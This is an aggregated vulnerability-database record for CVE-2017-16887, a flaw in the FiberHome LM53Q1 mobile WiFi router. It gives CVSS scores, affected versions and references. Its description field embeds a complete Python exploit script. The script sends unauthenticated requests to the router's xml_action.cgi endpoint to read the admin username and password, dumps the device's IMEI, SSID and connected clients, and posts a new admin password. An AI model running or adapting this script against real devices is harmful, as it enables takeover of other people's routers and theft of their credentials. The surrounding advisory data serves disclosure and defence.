ID

VAR-201801-0582


CVE

CVE-2017-16887


TITLE

FiberHome mobile WIFI Device model LM53Q1 Permissions vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2017-012103

DESCRIPTION

The portal on FiberHome Mobile WIFI Device Model LM53Q1 VH519R05C01S38 uses SOAP based web services in order to interact with the portal. Unauthorized Access to Web Services can result in disclosure of the WLAN key/password. FiberHome mobile WIFI Device model LM53Q1 Contains a permission vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. FiberHomeMobileWIFIDeviceLM53Q1 is a portable router device from China FiberHome. A vulnerability exists in the portal in the FiberHomeMobileWIFIDeviceLM53Q1VH519R05C01S38 release. An attacker could exploit the vulnerability to obtain a WLAN key/password. #!/usr/bin/python # /$$$$$$$$ /$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$$$$$$$ /$$ /$$ /$$ # | $$_____/|__/| $$ | $$ | $$ | $$__ $$ | $$ | $$_____/ | $$ |__/ | $$ # | $$ /$$| $$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ /$$$$$$ /$$$$$$/$$$$ /$$$$$$ | $$ \ $$ /$$$$$$ /$$$$$$/$$$$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ /$$ /$$ /$$$$$$ | $$ /$$$$$$ /$$ /$$$$$$ # | $$$$$ | $$| $$__ $$ /$$__ $$ /$$__ $$| $$$$$$$$ /$$__ $$| $$_ $$_ $$ /$$__ $$ | $$$$$$$/ /$$__ $$| $$_ $$_ $$ /$$__ $$|_ $$_/ /$$__ $$ | $$$$$ | $$ /$$/ /$$__ $$| $$ /$$__ $$| $$|_ $$_/ # | $$__/ | $$| $$ \ $$| $$$$$$$$| $$ \__/| $$__ $$| $$ \ $$| $$ \ $$ \ $$| $$$$$$$$ | $$__ $$| $$$$$$$$| $$ \ $$ \ $$| $$ \ $$ | $$ | $$$$$$$$ | $$__/ \ $$$$/ | $$ \ $$| $$| $$ \ $$| $$ | $$ # | $$ | $$| $$ | $$| $$_____/| $$ | $$ | $$| $$ | $$| $$ | $$ | $$| $$_____/ | $$ \ $$| $$_____/| $$ | $$ | $$| $$ | $$ | $$ /$$| $$_____/ | $$ >$$ $$ | $$ | $$| $$| $$ | $$| $$ | $$ /$$ # | $$ | $$| $$$$$$$/| $$$$$$$| $$ | $$ | $$| $$$$$$/| $$ | $$ | $$| $$$$$$$ | $$ | $$| $$$$$$$| $$ | $$ | $$| $$$$$$/ | $$$$/| $$$$$$$ | $$$$$$$$ /$$/\ $$| $$$$$$$/| $$| $$$$$$/| $$ | $$$$/ # |__/ |__/|_______/ \_______/|__/ |__/ |__/ \______/ |__/ |__/ |__/ \_______/ |__/ |__/ \_______/|__/ |__/ |__/ \______/ \___/ \_______/ |________/|__/ \__/| $$____/ |__/ \______/ |__/ \___/ # | $$ # | $$ # |__/ # Exploit Title: FiberHome MIFI LM53Q1 Multiple Vulnerabilities # Exploit Author: Ibad Shah # Vendor Homepage: www.fiberhome.com # Version: VH519R05C01S38 # Tested on: Linux # Platform : Hardware # CVE : CVE-2017-16885, CVE-2017-16886, CVE-2017-16887 # Greetz : Taimoor Zafar, Jawad Ahmed, Owais Mehtab, Aitezaz Mohsin, ZHC import requests,sys,getopt,socket,struct #Declaring IP as our global variable to probe for Gateway IP of Device global ip #Getting Gateway IP Address def get_default_gateway_linux(): with open("/proc/net/route") as fh: for line in fh: fields = line.strip().split() if fields[1] != '00000000' or not int(fields[3], 16) & 2: continue return socket.inet_ntoa(struct.pack("<L", int(fields[2], 16))) return; ip = get_default_gateway_linux() exploit_title = "=============================================== \n FiberHome Remote Administrator Account Details \n================================================"; #Function to get Device Statistics def get_device_details(): gateway = None hardware = None device_name = None devices_all = '' version = None gateway = None ssid = '' dns1 = None dns2 = None requestStatus = requests.get("http://192.168.8.1/xml_action.cgi?method=get&module=duster&file=status1") api_response = requestStatus.content.replace('\t','').split('\n') for results in api_response: if "<hardware_version>" in results: hardware = results.replace('<hardware_version>','').replace('</hardware_version>','').replace(' ','').replace('\n','') if "<device_name>" in results: device_name = results.replace('<device_name>','').replace('</device_name>','').replace(' ','').replace('\n','') if "<version_num>" in results: version = results.replace('<version_num>','').replace('</version_num>','').replace(' ','').replace('\n','') if "<gateway>" in results: gateway = results.replace('<gateway>','').replace('</gateway>','').replace(' ','').replace('\n','') if "<ssid>" in results: ssid = results.replace('<ssid>','').replace('</ssid>','').replace('\n','') if "<dns1>" in results: dns1 = results.replace('<dns1>','').replace('</dns1>','').replace(' ','').replace('\n','') if "<dns2>" in results: dns2 = results.replace('<dns2>','').replace('</dns2>','').replace(' ','').replace('\n','') if "<IMEI>" in results: imei = results.replace('<IMEI>','').replace('</IMEI>','').replace(' ','').replace('\n','') print "\n==============================================" print "\nHardware Version of Device : "+hardware+"\n" print "\nName of Device : "+device_name+"\n" print "\nSoftware Version of Device : "+version+"\n" print "\nIMEI of Device! : "+imei+"\n" print "\nWiFi SSID of Device : "+ssid+"\n" print "\nGateway of Zong Device : "+gateway+"\n" print "\nDNS Primary of Device : "+dns1+"\n" print "\nDNS Secondary of Device : "+dns2+"\n" print "\n=============================================================================\n"; if "<known_devices_list>" in results: devices_all = results.replace('<known_devices_list>','').replace('</known_devices_list>','').replace('\n','') print "\nConnected Devices to WIFI\n" print devices_all #Function for getting User Account Details to login to Portal def get_user_account_details(): request = requests.get("http://"+ip+"/xml_action.cgi?method=get&module=duster&file=admin") admin_details = request.content.replace('\t','').split('\n') for admin_login_response in admin_details: if "<router_username>" in admin_login_response: username = admin_login_response.replace('<router_username>','').replace('</router_username>','') if "<router_password>" in admin_login_response: password = admin_login_response.replace('<router_password>','').replace('</router_password>','') print "\nUsername of Device Web Application :\n"+username+" " print "Password of Device Web Application :\n"+password+"\n" print "\n=============================================================================\n"; #Function to change Administrator Password def change_admin_password(): set_password = raw_input("\nEnter Password to Change : ") password = str(set_password) xml = "<?xml version='1.0' encoding='UTF-8'?><RGW><management><router_password>"+password+"</router_password></management></RGW>" headers = {'Content-Type': 'application/xml'} change_password_request = requests.post("http://"+ip+"/xml_action.cgi?method=set&module=duster&file=admin", data=xml, headers=headers).text print "Password Changed!" def main(): print exploit_title print "\nSelect Menu For Fetching Details \n \n 1. Get Portal Login & Password. \n 2. Get Other Details. \n 3. Change Admin Password for Device" get_option = raw_input("\n Enter Option : "); option = int(get_option) if get_option == "1": get_user_account_details() raw_input("\n Press Any Key To Exit"); elif get_option == "2": get_device_details() raw_input("\n Press Any Key To Exit"); elif get_option == "3": change_admin_password() elif get_option == "": print "Good Bye!"; else: print "Goodbye!"; main()

Trust: 2.34

sources: NVD: CVE-2017-16887 // JVNDB: JVNDB-2017-012103 // CNVD: CNVD-2018-04088 // VULHUB: VHN-107854 // PACKETSTORM: 145737

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2018-04088

AFFECTED PRODUCTS

vendor:fiberhomemodel:lm53q1scope:eqversion:vh519r05c01s38

Trust: 1.6

vendor:fiberhome groupmodel:lm53q1scope:eqversion:vh519r05c01s38

Trust: 0.8

vendor:fiberhomemodel:mobile wifi device lm53q1 vh519r05c01s38scope: - version: -

Trust: 0.6

sources: CNVD: CNVD-2018-04088 // JVNDB: JVNDB-2017-012103 // CNNVD: CNNVD-201711-804 // NVD: CVE-2017-16887

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2017-16887
value: CRITICAL

Trust: 1.0

NVD: CVE-2017-16887
value: CRITICAL

Trust: 0.8

CNVD: CNVD-2018-04088
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-201711-804
value: MEDIUM

Trust: 0.6

VULHUB: VHN-107854
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2017-16887
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2018-04088
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-107854
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2017-16887
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 3.9
impactScore: 5.9
version: 3.0

Trust: 1.8

sources: CNVD: CNVD-2018-04088 // VULHUB: VHN-107854 // JVNDB: JVNDB-2017-012103 // CNNVD: CNNVD-201711-804 // NVD: CVE-2017-16887

PROBLEMTYPE DATA

problemtype:CWE-275

Trust: 1.9

sources: VULHUB: VHN-107854 // JVNDB: JVNDB-2017-012103 // NVD: CVE-2017-16887

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201711-804

TYPE

lack of information

Trust: 0.6

sources: CNNVD: CNNVD-201711-804

CONFIGURATIONS

sources: JVNDB: JVNDB-2017-012103

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-107854

PATCH

title:Top Pageurl:http://hk.fiberhomegroup.com/en/index.html

Trust: 0.8

sources: JVNDB: JVNDB-2017-012103

EXTERNAL IDS

db:NVDid:CVE-2017-16887

Trust: 3.2

db:EXPLOIT-DBid:43460

Trust: 1.7

db:JVNDBid:JVNDB-2017-012103

Trust: 0.8

db:CNNVDid:CNNVD-201711-804

Trust: 0.7

db:EXPLOITDBid:43460

Trust: 0.6

db:CNVDid:CNVD-2018-04088

Trust: 0.6

db:AUSCERTid:ESB-2019.3313

Trust: 0.6

db:VULHUBid:VHN-107854

Trust: 0.1

db:PACKETSTORMid:145737

Trust: 0.1

sources: CNVD: CNVD-2018-04088 // VULHUB: VHN-107854 // JVNDB: JVNDB-2017-012103 // PACKETSTORM: 145737 // CNNVD: CNNVD-201711-804 // NVD: CVE-2017-16887

REFERENCES

url:http://seclists.org/fulldisclosure/2018/jan/28

Trust: 2.5

url:https://www.exploit-db.com/exploits/43460/

Trust: 1.7

url:https://nvd.nist.gov/vuln/detail/cve-2017-16887

Trust: 0.9

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-16887

Trust: 0.8

url:https://www.ibm.com/support/docview.wss?uid=ibm10960426

Trust: 0.6

url:https://www.ibm.com/support/docview.wss?uid=ibm10887793

Trust: 0.6

url:https://www.auscert.org.au/bulletins/esb-2019.3313/

Trust: 0.6

url:https://www-01.ibm.com/support/docview.wss?uid=ibm10960426

Trust: 0.6

url:https://www.fiberhome.com

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2017-16885

Trust: 0.1

url:http://"+ip+"/xml_action.cgi?method=set&module=duster&file=admin",

Trust: 0.1

url:http://192.168.8.1/xml_action.cgi?method=get&module=duster&file=status1")

Trust: 0.1

url:http://"+ip+"/xml_action.cgi?method=get&module=duster&file=admin")

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2017-16886

Trust: 0.1

sources: CNVD: CNVD-2018-04088 // VULHUB: VHN-107854 // JVNDB: JVNDB-2017-012103 // PACKETSTORM: 145737 // CNNVD: CNNVD-201711-804 // NVD: CVE-2017-16887

CREDITS

Ibad Shah

Trust: 0.1

sources: PACKETSTORM: 145737

SOURCES

db:CNVDid:CNVD-2018-04088
db:VULHUBid:VHN-107854
db:JVNDBid:JVNDB-2017-012103
db:PACKETSTORMid:145737
db:CNNVDid:CNNVD-201711-804
db:NVDid:CVE-2017-16887

LAST UPDATE DATE

2024-11-23T21:24:37.034000+00:00


SOURCES UPDATE DATE

db:CNVDid:CNVD-2018-04088date:2018-03-02T00:00:00
db:VULHUBid:VHN-107854date:2018-02-02T00:00:00
db:JVNDBid:JVNDB-2017-012103date:2018-02-21T00:00:00
db:CNNVDid:CNNVD-201711-804date:2019-09-02T00:00:00
db:NVDid:CVE-2017-16887date:2024-11-21T03:17:10.950

SOURCES RELEASE DATE

db:CNVDid:CNVD-2018-04088date:2018-03-02T00:00:00
db:VULHUBid:VHN-107854date:2018-01-12T00:00:00
db:JVNDBid:JVNDB-2017-012103date:2018-02-21T00:00:00
db:PACKETSTORMid:145737date:2018-01-07T14:44:44
db:CNNVDid:CNNVD-201711-804date:2017-11-20T00:00:00
db:NVDid:CVE-2017-16887date:2018-01-12T17:29:00.990